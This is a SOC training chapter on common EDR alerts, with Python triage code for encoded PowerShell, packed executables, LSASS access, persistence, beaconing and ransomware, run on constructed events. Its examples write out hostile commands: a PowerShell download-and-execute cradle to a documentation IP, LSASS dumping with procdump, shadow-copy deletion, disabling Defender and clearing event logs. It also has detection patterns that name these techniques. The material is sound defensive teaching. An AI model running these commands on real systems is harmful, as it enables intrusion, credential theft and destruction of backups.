Common EDR alerts are detections generated when endpoint activity matches known malicious or suspicious behavior patterns.
These alerts help SOC analysts identify malware execution, lateral movement, credential access, persistence, or exploitation attempts at the earliest stages of an attack.
Understanding these alerts is essential because they form the core investigation workload in a SOC environment.
This chapter explains the most common EDR alerts in depth from a SOC perspective: what triggers them, how they appear in telemetry, which patterns to look for, and how analysts validate severity.
PowerShell Execution Alerts
PowerShell alerts are among the most frequent because attackers abuse PowerShell for fileless malware, C2 communication, and payload execution.
Indicators include:
- Encoded commands (-EncodedCommand / -enc, which takes the Base64 of the UTF-16LE script text)
- Obfuscated strings
- Hidden windows (-WindowStyle Hidden / -w hidden)
- Download commands (cradles such as DownloadString, DownloadFile or Invoke-WebRequest)
- Process injection
- Script block logging events (Event ID 4104)
Example telemetry:
powershell.exe -nop -w hidden -enc JAB...   (the JAB prefix is what a UTF-16LE script beginning with $ looks like in Base64)
powershell.exe → outbound to suspicious IP
powershell.exe spawned by WINWORD.EXE
Suspicious when:
- The parent process is Office, wscript, mshta, or a browser
- Encoded or obfuscated commands are present
- The process contacts unknown IPs or domains
Command and Scripting Engine Abuse Alerts
Attackers abuse script engines and signed system binaries such as:
- cmd.exe
- wscript.exe
- cscript.exe
- mshta.exe
- wmic.exe
- rundll32.exe
- regsvr32.exe
Example telemetry:
mshta.exe loading remote script from URL
rundll32.exe executing unknown DLL
regsvr32.exe loading COM object from Public folder
Suspicious when:
- Script engines are spawned by non-standard parents
- Paths reference user directories
- External URLs appear on the command line
- DLL loads come from TEMP or Public folders
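The following Python is an added example written for this chapter, not code from any EDR vendor. It applies the PowerShell checks (parent, hidden window, -enc decoding, download cradle) and the script-engine checks (external URL, module loaded from a user-writable path) to a handful of constructed process-creation events. The event field names (parent, image, cmdline), the parent allow-lists and the regular expressions are assumptions you would tune to your own telemetry schema; the encoded payload is generated inside the block so the decoder can be exercised offline.

```python
import base64
import re

# Constructed process-creation events used below are illustrative, not real
# telemetry; the field names (parent, image, cmdline) are an assumption.

# Parents that should rarely launch a script engine on a workstation (assumption).
PHISHING_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
    "chrome.exe", "msedge.exe", "firefox.exe",
}
SCRIPT_ENGINES = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "wmic.exe", "rundll32.exe", "regsvr32.exe",
}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\|\\users\\public\\|\\temp\\|\\appdata\\", re.I)
URL = re.compile(r"https?://[^\s'\"]+", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b|net\.webclient|bitsadmin",
    re.I,
)
# -EncodedCommand and its abbreviations; longest alternative first.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|en|e)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if there is none.

    PowerShell expects Base64 of the UTF-16LE script text, which is why a
    script starting with '$' always produces the familiar 'JAB' prefix.
    """
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_process(evt):
    """Return the reasons an analyst would escalate this event (empty list = nothing found)."""
    image, parent, cmd = basename(evt["image"]), basename(evt["parent"]), evt["cmdline"]
    if image not in SCRIPT_ENGINES:
        return []
    reasons = []
    if parent in PHISHING_PARENTS:
        reasons.append(f"spawned by {parent}")
    decoded = decode_encoded_command(cmd)
    # Scan the decoded script too: the cradle and URL are hidden inside the Base64.
    scan_text = cmd if decoded is None else cmd + " " + decoded
    if decoded is not None:
        reasons.append("encoded command: " + decoded[:60])
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
        reasons.append("hidden window")
    url = URL.search(scan_text)
    if url:
        reasons.append("external URL: " + url.group(0))
    if DOWNLOAD_CRADLE.search(scan_text):
        reasons.append("download cradle")
    if image in {"rundll32.exe", "regsvr32.exe"} and USER_WRITABLE.search(cmd):
        reasons.append("module loaded from user-writable path")
    return reasons


# Constructed sample: the script a macro might run, encoded the way PowerShell
# expects. 203.0.113.5 is a documentation (TEST-NET-3) address.
SAMPLE_SCRIPT = "$w=New-Object Net.WebClient;IEX $w.DownloadString('http://203.0.113.5/a.ps1')"
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {SAMPLE_ENC}"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://203.0.113.5/x.hta"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\upd.dll,Start"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

if __name__ == "__main__":
    for evt in SAMPLE_EVENTS:
        print(basename(evt["image"]), "->", triage_process(evt) or "no findings")
```

The point of decoding rather than just flagging -enc is that the decoded text is where the analyst reads the actual intent (here a download cradle and the staging URL); a rule that only matches the flag gives severity without context.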
Malware/Executable Discovery Alerts
EDR frequently detects malicious or suspicious executable behavior.
Triggers include:
- Unsigned executables
- High-entropy files (packed or encrypted content)
- Known malware signatures
- Tampering with system processes
- Attempts to disable security tools
Example telemetry:
payload.exe created in C:\Users\Public
unknown.exe connecting to an external IP
executable dropped by powershell.exe
Suspicious when:
- The filename looks like random characters
- The executable appears from phishing-related processes
- The file is correlated with network anomalies
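The following Python is an added example for this chapter, not EDR product code. It scores a newly created executable on the triggers listed above: Shannon entropy of the content, signer status, drop location, creating process, a crude random-name heuristic, and whether the same file later made an outbound connection. The sample events, the byte content standing in for file bodies, the field names (path, creator, signed) and the dropper-parent list are constructed assumptions.

```python
import math
import os
import re
from collections import Counter

# Sample file-create events and the byte content behind them are constructed
# for illustration; field names (path, creator, signed) are assumptions.

DROPPER_PARENTS = {"powershell.exe", "winword.exe", "excel.exe", "outlook.exe",
                   "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\|\\temp\\|\\appdata\\", re.I)
HIGH_ENTROPY = 7.2  # bits/byte; packed or encrypted payloads cluster above this (tuning assumption)


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_random(filename: str) -> bool:
    """Crude heuristic for machine-generated names: a stem with no vowels that also
    contains a digit, or one mixing four or more digits into letters."""
    stem = filename.rsplit("\\", 1)[-1].lower().rsplit(".", 1)[0]
    if len(stem) < 6:
        return False
    no_vowel = re.search(r"[aeiou]", stem) is None
    digits = len(re.findall(r"\d", stem))
    return (no_vowel and digits > 0) or digits >= 4


def triage_file_create(evt, content, later_connections):
    """Score a new executable the way an analyst would: content, signer, location,
    name, creating process, and whether the file later talked to the network."""
    reasons = []
    ent = shannon_entropy(content)
    if ent >= HIGH_ENTROPY:
        reasons.append(f"high entropy {ent:.2f} bits/byte (packed or encrypted)")
    if not evt["signed"]:
        reasons.append("unsigned")
    if USER_WRITABLE.search(evt["path"]):
        reasons.append("written to a user-writable location")
    if looks_random(evt["path"]):
        reasons.append("random-looking filename")
    creator = evt["creator"].lower()
    if creator in DROPPER_PARENTS:
        reasons.append(f"dropped by {creator}")
    for conn in later_connections:
        if conn["image"].lower() == evt["path"].lower():
            reasons.append(f"later connected to {conn['remote']}")
            break
    return reasons


PACKED = os.urandom(4096)            # stands in for a packed payload body (constructed)
PLAIN_PE_LIKE = b"MZ" + bytes(4094)  # stands in for a mostly-zero benign stub (constructed)

SAMPLE_EVENTS = [
    ({"path": r"C:\Users\Public\xk9fq2.exe", "creator": "powershell.exe", "signed": False}, PACKED),
    ({"path": r"C:\Program Files\Vendor\updater.exe", "creator": "msiexec.exe", "signed": True}, PLAIN_PE_LIKE),
]
# 203.0.113.5 is a documentation (TEST-NET-3) address.
SAMPLE_CONNECTIONS = [{"image": r"C:\Users\Public\xk9fq2.exe", "remote": "203.0.113.5:443"}]

if __name__ == "__main__":
    for evt, content in SAMPLE_EVENTS:
        print(evt["path"], "->", triage_file_create(evt, content, SAMPLE_CONNECTIONS) or "no findings")
```

Entropy alone is a weak signal (legitimate installers and compressed resources score high too); it is the combination with signer, location, creator and the later network connection that moves a file from "look at it" to "contain the host".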
Credential Dumping Alerts
EDR alerts on attempts to access or dump credentials from LSASS or SAM.
Common triggers:
- Mimikatz-like behavior (sekurlsa modules reading LSASS memory)
- procdump targeting LSASS
- Unusual handles opened to LSASS
- Handle access masks that include PROCESS_VM_READ (0x0010)
Example telemetry:
process: attacker.exe → lsass.exe (granted access: 0x10 = PROCESS_VM_READ)
procdump.exe -ma lsass.exe
powershell.exe exhibiting credential capture patterns
Suspicious when:
- The executable is unsigned or unexpected
- It occurs on high-value servers
- It follows initial compromise activity
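The following Python is an added example for this chapter, not vendor code. It decodes the access mask from an LSASS process-access event into the Windows process rights it contains (the constants are the documented PROCESS_* values) and applies the checks above: read access to LSASS memory, full access, an unexpected source image, a dump-tool command line, and host value. The event layout mirrors what Sysmon Event ID 10 reports (SourceImage, TargetImage, GrantedAccess) but the field names, the expected-reader allow-list and the sample events are assumptions.

```python
import re

# Process-access events below are constructed; the field names (source,
# target, granted_access, cmdline, host_role) are an assumption about the
# EDR schema, modelled on Sysmon Event ID 10.

ACCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
PROCESS_ALL_ACCESS = 0x1FFFFF

# Images that legitimately open LSASS with read rights on most fleets;
# an allow-list like this is tuned per environment (assumption).
EXPECTED_LSASS_READERS = {"msmpeng.exe", "csrss.exe", "wmiprvse.exe", "taskmgr.exe"}

DUMP_COMMANDS = [
    re.compile(r"procdump(64)?(\.exe)?\s+.*-ma\s+lsass", re.I),
    re.compile(r"comsvcs\.dll,?\s*MiniDump", re.I),  # rundll32 comsvcs.dll MiniDump <pid>
    re.compile(r"sekurlsa::", re.I),                  # Mimikatz module syntax
]


def decode_access(mask):
    """Translate a granted-access mask into the named rights it carries."""
    if (mask & PROCESS_ALL_ACCESS) == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in ACCESS_RIGHTS.items() if mask & bit]


def triage_lsass_access(evt):
    """Reasons to escalate a process-access event whose target is lsass.exe."""
    if evt["target"].lower().rsplit("\\", 1)[-1] != "lsass.exe":
        return []
    source = evt["source"].lower().rsplit("\\", 1)[-1]
    mask = evt["granted_access"]
    rights = decode_access(mask)
    reasons = []
    if mask & 0x0010:  # PROCESS_VM_READ is what credential theft needs
        reasons.append("handle allows reading LSASS memory: " + "|".join(rights))
    if rights == ["PROCESS_ALL_ACCESS"]:
        reasons.append("full access requested (typical of dump tools)")
    if source not in EXPECTED_LSASS_READERS:
        reasons.append(f"unexpected source {source}")
    for pat in DUMP_COMMANDS:
        if pat.search(evt.get("cmdline", "")):
            reasons.append("dump-tool command line")
            break
    if evt.get("host_role") in {"domain_controller", "server"}:
        reasons.append("high-value host")
    return reasons


SAMPLE_EVENTS = [
    {"source": r"C:\Users\Public\attacker.exe", "target": r"C:\Windows\System32\lsass.exe",
     "granted_access": 0x1010, "cmdline": "attacker.exe", "host_role": "workstation"},
    {"source": r"C:\Tools\procdump.exe", "target": r"C:\Windows\System32\lsass.exe",
     "granted_access": 0x1FFFFF, "cmdline": "procdump.exe -ma lsass.exe lsass.dmp",
     "host_role": "domain_controller"},
    {"source": r"C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1410, "cmdline": "",
     "host_role": "workstation"},
    {"source": r"C:\Windows\System32\svchost.exe", "target": r"C:\Windows\System32\spoolsv.exe",
     "granted_access": 0x1000, "cmdline": "", "host_role": "workstation"},
]

if __name__ == "__main__":
    for evt in SAMPLE_EVENTS:
        print(hex(evt["granted_access"]), decode_access(evt["granted_access"]), triage_lsass_access(evt))
```

The allow-listed Defender engine still produces one reason (it really does read LSASS memory), so the output is a ranked list for the analyst rather than a binary verdict; the unexpected source and the dump-tool command line are what separate the two alerts worth paging on.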
Persistence Mechanism Alerts
Attackers create persistence to survive reboots.
Common persistence alerts:
- Registry Run key creation
- Scheduled tasks
- Services created or modified
- Startup folder modifications
- WMI event subscriptions
Example telemetry:
reg.exe writing HKCU\Software\Microsoft\Windows\CurrentVersion\Run
schtasks.exe /create /tn Update
new service created: updater
Suspicious when:
- Persistence is created shortly after malware execution
- It is registered by unusual parents (powershell.exe, cmd.exe)
- It occurs on non-admin workstations
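The following Python is an added example for this chapter, not EDR product code. It classifies a raw event into one of the persistence mechanisms above and then applies the three validation checks: proximity in time to an earlier alert on the same host, a scripting parent, and a payload in a user-writable path, plus whether the host is a workstation with a non-admin user. The events, prior alerts and field names (host, time, image, parent, cmdline, file_written, host_role, user_is_admin) are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Events and prior alerts are constructed for illustration; field names are assumptions.

RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?\b", re.I)
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\|\\temp\\|\\appdata\\|\\programdata\\", re.I)
SCRIPTING_PARENTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def classify_persistence(evt):
    """Map a raw event to the persistence mechanism it creates, or None."""
    cmd = evt["cmdline"]
    img = evt["image"].lower()
    if img == "reg.exe" and RUN_KEY.search(cmd) and re.search(r"\badd\b", cmd, re.I):
        return "registry run key"
    if img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        return "scheduled task"
    if img == "sc.exe" and re.search(r"\bcreate\b|\bconfig\b", cmd, re.I):
        return "service"
    written = evt.get("file_written", "")
    if written and re.search(r"\\start menu\\programs\\startup\\", written, re.I):
        return "startup folder"
    if re.search(r"__EventFilter|CommandLineEventConsumer|__FilterToConsumerBinding", cmd, re.I):
        return "wmi subscription"
    return None


def triage_persistence(evt, prior_alerts, window=timedelta(minutes=15)):
    """Return (mechanism, reasons). Reasons follow the chapter's checks: timing after a
    prior alert on the same host, scripting parent, payload location, non-admin workstation."""
    mechanism = classify_persistence(evt)
    if mechanism is None:
        return None, []
    reasons = []
    ts = datetime.fromisoformat(evt["time"])
    for alert in prior_alerts:
        if alert["host"] != evt["host"]:
            continue
        delta = ts - datetime.fromisoformat(alert["time"])
        if timedelta(0) <= delta <= window:
            reasons.append(f"{int(delta.total_seconds())}s after '{alert['name']}' on the same host")
            break
    if evt["parent"].lower() in SCRIPTING_PARENTS:
        reasons.append(f"registered by {evt['parent'].lower()}")
    target = evt.get("file_written") or evt["cmdline"]
    if USER_WRITABLE.search(target):
        reasons.append("payload lives in a user-writable path")
    if evt.get("host_role") == "workstation" and not evt.get("user_is_admin", False):
        reasons.append("set on a workstation by a non-admin user")
    return mechanism, reasons


PRIOR_ALERTS = [
    {"host": "WS-042", "time": "2024-05-01T10:02:00", "name": "encoded PowerShell from WINWORD.EXE"},
]
SAMPLE_EVENTS = [
    {"host": "WS-042", "time": "2024-05-01T10:05:30", "image": "reg.exe", "parent": "powershell.exe",
     "cmdline": r'reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ '
                r'/d "C:\Users\bob\AppData\Roaming\upd.exe"',
     "host_role": "workstation", "user_is_admin": False},
    {"host": "WS-042", "time": "2024-05-01T10:06:10", "image": "schtasks.exe", "parent": "cmd.exe",
     "cmdline": r"schtasks.exe /create /tn Update /tr C:\Users\Public\u.vbs /sc onlogon",
     "host_role": "workstation", "user_is_admin": False},
    {"host": "SRV-01", "time": "2024-05-01T12:00:00", "image": "sc.exe", "parent": "msiexec.exe",
     "cmdline": r"sc.exe create VendorAgent binPath= C:\Program Files\Vendor\agent.exe start= auto",
     "host_role": "server", "user_is_admin": True},
]

if __name__ == "__main__":
    for evt in SAMPLE_EVENTS:
        print(evt["host"], triage_persistence(evt, PRIOR_ALERTS))
```

The time-window correlation is the check that matters most in practice: a Run key on its own is noise on a fleet where installers write them all day, but a Run key three minutes after an encoded PowerShell alert on the same host is the persistence stage of the same intrusion.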
Lateral Movement Alerts
Issued when an attacker moves from one compromised host to another inside the network.
Common indicators:
- PsExec usage
- WinRM execution
- Remote PowerShell
- SMB connections from unusual hosts
- WMI process launches
Example telemetry:
PSEXESVC.exe installed as a service and spawned by services.exe
wmiprvse.exe spawning a process after a remote WMI call
PowerShell remoting session created (wsmprovhost.exe on the target)
Suspicious when:
- Movement originates from a compromised workstation
- Lateral actions target servers or domain controllers
- It is combined with credential dumping behavior
Suspicious Network Connection Alerts
EDR monitors outbound connections for suspicious behavior.
Indicators:
- C2 traffic
- Beaconing
- Connections to newly created domains
- High-frequency small HTTPS requests
- Network traffic from unusual binaries
Example telemetry:
powershell.exe → 91.22.113.10:443
dllhost.exe repeatedly beaconing every 60 seconds
exe in AppData connecting to unknown domain
Suspicious when:
- The domain is newly registered
- The IP belongs to bulletproof hosting
- The pattern matches C2 behavior
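The following Python is an added example for this chapter, not vendor code. It turns the beaconing indicator into a measurable check: for one (process, destination) pair it computes the inter-arrival gaps between connections and their relative jitter, and flags low jitter over many connections as beaconing; it then adds the chapter's other checks, an unusual binary, a binary in a user-writable path, and a newly seen domain. The timestamps, the domain first-seen table (a stand-in for a WHOIS or passive-DNS lookup) and the thresholds are constructed assumptions.

```python
import re
import statistics

# Connection records are constructed; timestamps are epoch seconds.
# DOMAIN_FIRST_SEEN stands in for a WHOIS or passive-DNS lookup (assumption).

UNUSUAL_NETWORK_BINARIES = {"powershell.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
                            "wscript.exe", "cscript.exe", "dllhost.exe", "notepad.exe"}
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\|\\temp\\|\\appdata\\", re.I)
NEW_DOMAIN_SECONDS = 30 * 86400


def interval_stats(timestamps, min_count=6):
    """Inter-arrival statistics for one (process, destination) pair.
    Returns None when there are too few connections to judge periodicity."""
    ts = sorted(timestamps)
    if len(ts) < min_count:
        return None
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    mean = statistics.fmean(gaps)
    jitter = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
    return {"count": len(ts), "median_gap": statistics.median(gaps), "jitter": jitter}


def is_beacon(stats, max_jitter=0.2):
    """Low relative jitter over many connections is the beaconing signature.
    C2 frameworks add jitter on purpose, so max_jitter is tuned per environment."""
    return stats is not None and stats["jitter"] <= max_jitter


def triage_connections(image, remote, timestamps, now):
    """Reasons to escalate the connections from `image` to `remote` (host:port)."""
    host, _, _ = remote.rpartition(":")
    reasons = []
    stats = interval_stats(timestamps)
    if is_beacon(stats):
        reasons.append(f"beaconing: {stats['count']} connections, median gap "
                       f"{stats['median_gap']:.0f}s, jitter {stats['jitter']:.2f}")
    name = image.rsplit("\\", 1)[-1].lower()
    if name in UNUSUAL_NETWORK_BINARIES:
        reasons.append(f"{name} rarely needs outbound connections")
    if USER_WRITABLE.search(image):
        reasons.append("binary runs from a user-writable path")
    first_seen = DOMAIN_FIRST_SEEN.get(host)
    if first_seen is not None and now - first_seen < NEW_DOMAIN_SECONDS:
        reasons.append(f"domain first seen {(now - first_seen) // 86400} days ago")
    return reasons


BASE = 1717200000
NOW = BASE + 3600
# dllhost.exe checking in every 60 s with a second or two of jitter (constructed)
PERIODIC = [BASE + 60 * i + j for i, j in enumerate([0, 1, -1, 0, 2, 0, -2, 1, 0, 1, 0, -1])]
# a browser fetching a site when the user clicks (constructed)
IRREGULAR = [BASE + x for x in [0, 7, 9, 40, 41, 200, 260, 700]]
DOMAIN_FIRST_SEEN = {
    "upd-check.example": NOW - 5 * 86400,    # registered last week (constructed)
    "example.com": NOW - 3650 * 86400,       # long-established (constructed)
}

if __name__ == "__main__":
    print(triage_connections(r"C:\Windows\System32\dllhost.exe", "upd-check.example:443", PERIODIC, NOW))
    print(triage_connections(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "example.com:443", IRREGULAR, NOW))
    print(triage_connections(r"C:\Users\bob\AppData\Roaming\svc.exe", "203.0.113.5:443", IRREGULAR, NOW))
```

Relative jitter (standard deviation divided by mean gap) rather than a fixed interval is what lets the same rule catch a 60-second beacon and a 4-hour one; the failure mode is a C2 profile with 40% or more jitter, which this check misses by design and which the newly-seen-domain and unusual-binary checks are there to catch.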
Fileless Malware Alerts
Fileless malware runs entirely in memory.
Indicators:
- Memory injection
- Script-based payloads
- No associated dropped file
- Reflective DLL loading
Example telemetry:
malicious thread injected into explorer.exe
powershell.exe loading a .NET assembly from memory
rundll32.exe loading a DLL from a memory buffer rather than from disk
Suspicious when:
- Child processes interact with network endpoints
- Memory regions are mapped readable, writable and executable (RWX)
- The process has no legitimate reason to inject
Ransomware Behavior Alerts
Common high-severity EDR alerts include:
- Mass file rename events
- File encryption patterns
- Shadow copy deletion attempts
- Backup tampering
- High-volume file modifications
Example telemetry:
vssadmin.exe Delete Shadows /All
unknown.exe renaming hundreds of files
high disk write operations
Suspicious when:
- Activity starts immediately after suspicious execution
- Commands occur outside admin maintenance windows
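The following Python is an added example for this chapter, not EDR product code. It implements the two ransomware checks above on a constructed event stream: a sliding-window count of rename events per process that fires when 100 renames land within 60 seconds and most of them share one new extension, and a match on the shadow-copy and backup-tampering commands (vssadmin delete shadows, wmic shadowcopy delete, wbadmin delete catalog, bcdedit recoveryenabled No). The events, field names (ts, pid, image, op, old_path, new_path, cmdline) and thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque

# File and process events below are constructed; field names are assumptions.

RECOVERY_TAMPERING = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
    re.compile(r"bcdedit(\.exe)?.*\brecoveryenabled\s+no\b", re.I),
]
RENAME_THRESHOLD = 100   # renames per process inside WINDOW seconds (tuning assumption)
WINDOW = 60.0
EXT_SHARE = 0.8          # fraction of renames landing on one new extension


def is_recovery_tampering(cmdline):
    return any(p.search(cmdline) for p in RECOVERY_TAMPERING)


def ext(path):
    name = path.rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def detect_mass_rename(events):
    """Sliding-window count of rename events per process. A process is flagged the
    first time RENAME_THRESHOLD renames fall within WINDOW seconds and at least
    EXT_SHARE of them share one new extension. Returns {pid: details}."""
    windows = defaultdict(deque)
    flagged = {}
    for evt in sorted(events, key=lambda e: e["ts"]):
        if evt["op"] != "rename":
            continue
        q = windows[evt["pid"]]
        q.append((evt["ts"], ext(evt["new_path"])))
        while q and evt["ts"] - q[0][0] > WINDOW:
            q.popleft()
        if len(q) >= RENAME_THRESHOLD and evt["pid"] not in flagged:
            exts = [e for _, e in q]
            top = max(set(exts), key=exts.count)
            if exts.count(top) / len(exts) >= EXT_SHARE:
                flagged[evt["pid"]] = {"image": evt["image"], "renames": len(q),
                                       "new_extension": top, "window_end": evt["ts"]}
    return flagged


def triage_ransomware(events):
    """Combine the mass-rename detector with the recovery-tampering command match."""
    tampering = [e["cmdline"] for e in events
                 if e["op"] == "process" and is_recovery_tampering(e["cmdline"])]
    return {"mass_rename": detect_mass_rename(events), "recovery_tampering": tampering}


def constructed_events():
    events = []
    # 150 documents renamed to .locked by an unknown binary over 30 seconds
    for i in range(150):
        events.append({"ts": 1000.0 + i * 0.2, "pid": 4242, "image": r"C:\Users\Public\unknown.exe",
                       "op": "rename", "old_path": rf"C:\Users\bob\Documents\report{i}.docx",
                       "new_path": rf"C:\Users\bob\Documents\report{i}.docx.locked"})
    # a user renaming a handful of photos in Explorer at the same time
    for i in range(5):
        events.append({"ts": 1005.0 + i * 3, "pid": 1337, "image": r"C:\Windows\explorer.exe",
                       "op": "rename", "old_path": rf"C:\Users\bob\Pictures\IMG_{i}.jpg",
                       "new_path": rf"C:\Users\bob\Pictures\trip_{i}.jpg"})
    # the recovery-tampering step that typically follows
    events.append({"ts": 1031.0, "pid": 4242, "image": r"C:\Users\Public\unknown.exe",
                   "op": "process", "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"})
    return events


if __name__ == "__main__":
    print(triage_ransomware(constructed_events()))
```

Because the detector fires on the hundredth rename rather than at the end of the stream, it gives the responder a time of first detection (window_end) that can be compared against the suspicious execution that preceded it, which is the "starts immediately after suspicious execution" check above; the shadow-copy command arriving from the same pid a few seconds later is the confirmation.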
Defense Evasion Alerts
Attackers disable or bypass security tools.
Indicators:
- Killing antivirus/EDR processes
- Modifying registry keys to weaken defenses
- Clearing event logs
- Obfuscation attempts
Example telemetry:
powershell Set-MpPreference -DisableRealtimeMonitoring $true
taskkill /F /IM antivirus.exe
wevtutil cl Security
Suspicious when:
- The activity comes from non-admin accounts
- It occurs after malware execution
- It correlates with lateral movement
Intel Dump
- Common EDR alerts include PowerShell abuse, fileless malware, credential dumping, persistence creation, and lateral movement.
- EDR highlights suspicious parents, paths, network activity, and behavioral patterns.
- Alerts are validated by checking lineage, command-line arguments, reputation, and correlated logs.
- High-severity alerts include LSASS access, ransomware patterns, and C2 communication.
- Process tree context is essential for determining true malicious intent.